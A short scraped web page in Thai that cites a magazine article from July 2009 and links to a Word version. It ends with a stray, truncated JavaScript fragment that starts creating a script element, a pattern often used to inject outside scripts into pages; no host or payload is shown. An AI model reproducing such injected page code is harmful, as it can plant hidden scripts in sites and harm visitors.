พิมพ์ลงใน นิตยสาร โบนัสแห่งวัย ฉบับที่ 14 เดือนกรกฎาคม 2552

เพิ่มเติม (ms word)

var d=document;var s=d.createElement(‘script’);